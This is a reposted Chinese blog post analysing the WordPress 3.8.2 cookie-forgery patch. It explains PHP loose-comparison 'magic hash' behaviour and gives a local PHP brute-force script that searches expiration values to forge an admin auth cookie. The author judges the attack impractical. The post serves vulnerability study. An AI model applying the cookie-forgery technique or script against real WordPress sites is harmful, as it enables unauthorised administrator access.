WordPress 3.8.2 cookie伪造漏洞再分析

最新推荐文章于 2024-11-01 00:45:54 发布
转载 最新推荐文章于 2024-11-01 00:45:54 发布 · 473 阅读 · 0
文章标签:

#php

0x00 背景

看了WordPress 3.8.2补丁分析 HMAC timing attack,眼界大开,原来还可以利用时间差来判断HMAC。

但我总觉得这个漏洞并不是简单的修复这个问题。

查看了官方提供的资料:“该漏洞是由WordPress的安全团队成员Jon Cave发现。”。

也许漏洞还有这样利用的可能。

0x01 PHP的特性

当PHP在进行 ”==”,”!=”等非严格匹配的情况下,会按照值的实际情况,进行强制转换。

1
2
3
4
5
6
<?php
var_dump(0 == '0'); // true
var_dump(0 == 'abcdefg'); // true 
var_dump(0 === 'abcdefg'); // false
var_dump(1 == '1abcdef'); // true 
?>

当有一个对比参数是整数的时候,会把另外一个参数强制转换为整数。

0x02 分析修复的代码

官方版的diff只在php里改动了一个位置:

1
2
3
4
<?php
-  if ( $hmac != $hash ) { 
+  if ( hash_hmac( 'md5', $hmac, $key ) !== hash_hmac( 'md5', $hash, $key ) ) {
?>

其中$hmac来源于cookies。是我们可控的一个输入参数。

1
2
3
4
5
6
<?php
Admin|1397564163|1f253e501c301bf5bf293c40d7d92ded
//$username = ‘Admin’;
//$expiration = 1397564163;
//$hmac = ‘1f253e501c301bf5bf293c40d7d92ded’;
?>

$hash是以下代码生成一个md5值。

1
2
3
4
<?php
$key = wp_hash($username . $pass_frag . '|' . $expiration, $scheme);
$hash = hash_hmac('md5', $username . '|' . $expiration, $key);
?>

$hmac == $hash 时,登录成功。

那么,有几种情况会登录成功。

1
2
3
4
5
6
7
8
9
10
11
<?php
//第一种情况,完全相等。
$hmac = ‘1f253e501c301bf5bf293c40d7d92ded’;
$hash = ‘1f253e501c301bf5bf293c40d7d92ded’;
//第二种情况.第一位为数字,第二位为字母
$hmac = 1;
$hash = ‘1f253e501c301bf5bf293c40d7d92ded’;
//第三种情况。第一位为字母
$hmac = 0;
$hash = ‘af253e501c301bf5bf293c40d7d92ded’;
?>

很明显,第三种出现的情况非常大。

那么我们有没有可能把$hmac构造成一个整数0呢?

0x03 漏洞利用

我们看看cookie解析的代码:

1
2
3
4
5
6
<?php
    $cookie_elements = explode('|', $cookie);
    if ( count($cookie_elements) != 3 )
        return false;
    list($username, $expiration, $hmac) = $cookie_elements;
?>

当我们把cookie设置为:

Admin|1397564163|1

时。$hmac=’1’。但是,$hmac是字符串1,而不是整数1。

1
2
3
<?php
var_dump($hmac);//string(“1”);
?>

非常遗憾,这个漏洞是不能利用的。

难道官方修复的真的不是这个漏洞?

0x04 柳暗花明又一村

还有什么情况能让字符串识别成整数吗?是的,还有!

1
2
3
<?php
var_dump("0" == "0e1234567890123456...32"); // true
?>

‘e’会识别为次方,0的N次方为0;

所以,这个漏洞的利用方式还可以是: 让$hmac = ‘0’;

通过改变$expiration来改变$hash。获得一个,第一位为0,第二位为e,后面所有位为数字的$hash.

1
2
3
4
5
<?php
$hmac = ‘0’;
$hash = ‘0e1234567890123456...32’;
var_dump($hmac == $hash);  // true
?>

0x05 攻击代码

本地测试代码(实际攻击代码应该是构造cookies远程请求):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php
    include( 'wp-load.php' );
 
    $user = get_userdata(1);
    $username = $user->user_login;
    $pass_frag = substr($user->user_pass, 8, 4);
 
    $expiration = 9999999999; //设置一个很大的过期时间,然后递减
 
    while($expiration >0){
        $key = wp_hash($username . $pass_frag . '|' . $expiration, 'auth');
        $hash = hash_hmac('md5', $username . '|' . $expiration, $key);
        if('0' == $hash OR '1'== $hash ){
            echo $expiration.'@'.$hash;
            file_put_contents('done.txt',$expiration.'@'.$hash);
            exit();
        }
        $expiration -= 1;//过期时间-1
        echo $expiration.'@'.$hash."\r\n";
    }
?>

通过改变过期时间,尝试碰撞到可以利用的hash。

按照理论值。碰撞到可以利用的$expiration几率是(2110^30)/(16^32)。也就是5.8774717541114 * 10 -9。

理论上:把cookies设置成 “admin|碰撞到的过期时间|0”,就可以登陆后台了。

但是几率太小,还不如穷举密码了。

Ps:我本地跑了几个小时了,还没遇到一个。

Trouble-J
关注
漏洞挖掘】——135、 逻辑漏洞Cookie仿冒
Fly_鹏程万里
07-26 314
服务器为鉴别客户端浏览器会话及身份信息会将用户身份信息存储在Cookie中 并发送至客户端存储,攻击者通过尝试修改Cookie中的身份标识,从而达到仿冒其他用户 身份的目的并拥有相关用户的所有权限。
cookie仿冒漏洞
94小菜
01-04 961
简介: 服务器为鉴别客户端浏览器会话及身份信息,会将用户身份信息存储在 Cookie中, 并发送至客户端存储。攻击者通过尝试修改Cookie中的身份标识,从而达到仿冒其他用户 身份的目的,并拥有相关用户的所有权限 危害: 越权获取他人权限功能 漏洞挖掘: cookie中存在用户名的,替换为admin或其他存在账号 案例: ...
WordPress更新至 3.8.2 修复多个漏洞
weixin_34130389的博客
03-08 309
news · 2014/04/11 17:46在被OpenSSL刷屏的时候,WordPress更新。WordPress 3.8.2现在已经提供下载,最新的版本更新了几个重要的安全问题,所以推荐更新。WordPress 3.8.2修复的一个重要漏洞cookie伪造漏洞(CVE -2014- 0166)。该漏洞可以被攻击者利用通过伪造身份验证Cookie,登陆网站。该漏洞是由WordPress的安全...
WRMPS经典Cookie欺骗漏洞批量拿下shell-黑客博客
weixin_34138056的博客
01-08 281
WRMPS(网人信息发布系统)是一款功能非常强大的地方门户系统,用它做门户网站再好不过了。不过最近发现一个很老的漏洞,很多人会问:既然是很老的漏洞了,危险漫步你为什么还拿出来呢?是因为这个漏洞利用率非常高,以至于现在都是。下面我危险漫步就为大家介绍这个漏洞的利用方法。漏洞范围很广,后台没有开启认证码或者后台认证码为默认的WRMPS6。一、拿后台打开Google搜索“Powered By WRMPS...
安全研究人受够!再公布WordPress 3大外挂漏洞
weixin_33766805的博客
04-16 245
有安全研究人员最近连续藉由Plugin Vulnerabilities平台,对外公布了3WordPress插件的零时差漏洞,陷逾10万个WordPress网站于安全风险中,而相关研究人员在公布这些漏洞时,提及他们只是为了抗议WordPress支持论坛版的版主行为,只要版主停止不当行为,他们也会立即终止对外揭露零时差漏洞。无端受到池鱼之殃的3WordPress插件分别是Social Warfar...
WordPress 3.8.2 管理程序功能概览
WordPress 3.8.2是其众多版本中的一次更新,这个特定版本主要关注了界面设计的改进、后台管理的优化以及安全性提升等方面。 从【描述】中我们可以了解到,wordpress 的管理程序(wBE)非常方便,意味着它提供了一个...
wordpress_3.8.2.zip
04-14
通过以上分析,我们可以看出,"wordpress_3.8.2.zip"中的每个文件都在WordPress生态系统中扮演着不可或缺的角色。无论是对于初学者还是经验丰富的开发者,理解这些文件的功能和相互关系都是提升WordPress管理技能的...
WordPress主题:NewsPlus v3.8.2新闻和杂志主题2022年最新版.zip
05-20
"WordPress主题:NewsPlus v3.8.2新闻和杂志主题2022年最新版 WordPress主题/WordPress插件/html网站模板/iOS app源码/安卓app源码 每天更新上传!" ---------- 每天更新发布最新WordPress主题、HTML主题、...
移动用户分析 OS:Ubuntu16.04 Weka 3.8.2 Insight 8.2
08-03
熟悉insight、weka等软件的安装和使用; 了解通过移动数据识别商圈的业务流程; 熟悉商圈识别过程使用的算法。 数据准备 数据分析
WordPress插件】2022年最新版完整功能demo+插件v3.8.2.zip
04-04
"【WordPress插件】2022年最新版完整功能demo+插件v3.8.2 Master Popups - WordPress Popup Plugin for Email Subscription Master Popups - 用于电子邮件订阅的Wordpress Popup插件" ---------- 泰森云每天更新...
了解cookie以及cookie跨站点伪造攻击(CSRF)
我的专栏
05-15 3265
背景知识: 很久很久以前,Web基本上就是文档的浏览而已,既然是浏览,作为服务器,不需要纪录谁在某一段时间里浏览了什么 文档,每次请求都是一个新的Http协议,就是请求加响应,尤其是我不用记住是谁刚刚发了HTTP请求,每个请求对我 来说是全新的,这段时间很嗨皮。 但是,随着交互式Web应用的兴起,像在线购物网站,需要登录的网站等等,马上就面临一个问题,那就是要管理回话, 必须记住那些人登录系统,那些人往自己的购物车中放商品,也就是说我必须把每个人区分开,这就是一个不小的挑战, 因为HTTP请求是无状态.
黑客能利用不安全的cookies劫持你的WordPress博客
luyong3435的专栏
05-28 973
Everywhere 和 Privacy Badger Firefox 维护者 Yan Zhu 发现了 WordPress 的一个安全漏洞,该漏洞将允许黑客劫持你的 WordPress 博客。她发现一个重要的 cookies“wordpress_logged_in”在输入有效的用户名和密码后通过 HTTP 明文发送到 WordPress 的一个认证端点。 也就是说,你可以拷贝这个 cooki
WordPress 3.8.1 /xmlrpc.php拒绝服务漏洞
weixin_30376323的博客
03-27 435
漏洞版本: WordPress 3.8.1 漏洞描述: WordPress是一款内容管理系统。 WordPress 3.8.1 /xmlrpc.php 文件有ping其他主机的功能,通过这个功能可以请求多个站点,DDOS攻击别的网站。 <* 参考 http://blog.sucuri.net/2014/03/more-than-162000-wordpress...
一文让你彻底搞懂cookie和session产生漏洞的原理
carrot11223的博客
01-23 1363
这种再次请求的时候,cookie里面就不会再出现敏感值,但是存在sessionid的值,一个sessionid对应一个session,session可以理解为打电话,如果一方挂断了电话,就结束了本次通话,当第二次用另一个浏览器进行访问的时候(另外一次电话连接),sessionid就已经变了,不同的电话连接有不同的session,既然cookie可以进行cookie伪造,那session可以嘛?那盗取又是什么意思呢?可以看到无论是cookie还是session都可以进行身份验证,只是储存的位置不一致。
意想不到!WordPress安全漏洞98%来自插件
weixin_33775572的博客
05-20 197
资安业者Imperva在2018年所进行的调查显示,尽管WordPress是黑客最常锁定的内容管理平台(Content Management System),但全球的WordPress网站漏洞,却有高达98%与插件有关,只有2%涉及WordPress核心。在全球的网站中,有28%是以WordPress架设,若计算全球基于CMS的网站,WordPress的市占率更高达59%。 市占率最高的平台自然...
逻辑漏洞详解一
cxm4545的博客
07-26 876
由于开发人员设计程序时逻辑不严密,导致攻击者可以修改,绕过或者中断整个程序,让程序并非按照研发设计的逻辑运行,而是从开发人员预料之外去执行,这就是逻辑漏洞。(由于逻辑漏洞涉及到的内容杂且多,所以我将分为几篇来写,本篇主要讲身份验证的漏洞)session固定攻击是利用服务器的session不变机制,借他人之手获得认证和授权,然后冒用他人。通过伪造Cookie信息能够伪造其他用户进行登录。
COOKIE仿冒测试
最新发布
Sun_12_2的博客
11-01 490
COOKIE仿冒测试
WordPress 漏洞详情:从任意文件删除到任意代码执行
qq_57003296的博客
04-07 506
WordPress是网络上最受欢迎的CMS系统。据w3tech统计,约有30%的网站运行了该系统。该系统的应用是如此广泛,难免会成为网络犯罪分子攻击目标。在这篇博文中,我们将为读者介绍WordPress内核中的一个任意文件删除漏洞,这个漏洞可能会导致攻击者执行任意代码。早在7个月前,我们就向WordPress安全团队报告了这个漏洞,但到目前为止,该漏洞仍然没有得到修补。自初次报告(该报告既没有提供任何补丁,也没有给出具体的修复计划)至今,已经过了漫长的时间,但是仍然没有看到任何的修复迹象,所以,我们...
Wordpress漏洞
热门推荐
Grey的博客
07-19 2万+
爆路径方法: 1.http://www.chouwazi.com/wp-admin/includes/admin.php   2.http://www.chouwazi.com/wp-content/plugins/akismet/akismet.php   3.http://www.chouwazi.com/wp-content/plugins/akismet/hello.php   4...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值